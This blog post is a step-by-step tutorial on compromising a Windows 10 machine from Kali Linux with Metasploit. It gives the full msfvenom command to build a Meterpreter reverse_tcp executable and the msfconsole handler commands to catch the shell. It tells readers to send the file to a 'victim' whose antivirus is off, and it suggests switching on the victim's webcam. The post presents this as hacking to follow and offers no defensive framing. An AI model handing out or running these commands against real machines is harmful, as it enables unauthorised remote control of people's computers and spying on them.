Exploiting Windows 10 Using Metasploit On Kali Linux
- Hello everyone this blog helps you to hack windows using kali linux.
- So firstly you have to install kali linux on VIRTUAL BOX or VMWARE of your choice.
- In this their are two devices one's pc run kali i.e ATTACKER and the another one pc windows i.e VICTIM and in this both the devices are on same network.
- I already install kali in my virtual box and you have to set your network to BRIDGED ADAPTER.
- Now i describe below the steps to do the program,
STEP 1: Go to kali linux terminal and type the command ,
i.e, msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your ip address of kali lport=8080 -f exe>exploit name.exe
STEP 2: Now the exe file created send it to victims device (NOTE:-Antivirus on victim device must be off for executing the exe file)
STEP 3: Now one by one type the command as shown below,
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip address of kali
set lport 8080
exploit
STEP 4: Now open the exe file on victims device.
STEP 5: Now you can see the session created on kali linux. (as shown in the image above)
STEP 6: Now you have access of victim's device. lets take an example by stating webcam on victim device.
- By type help shows all command in the session to do on victim's device.
THANK YOU
FOLLOW THE BLOG FOR MORE AMAZING HACKS
- For any doubt just comment below i try my best to solve your problem....................
Comments
Post a Comment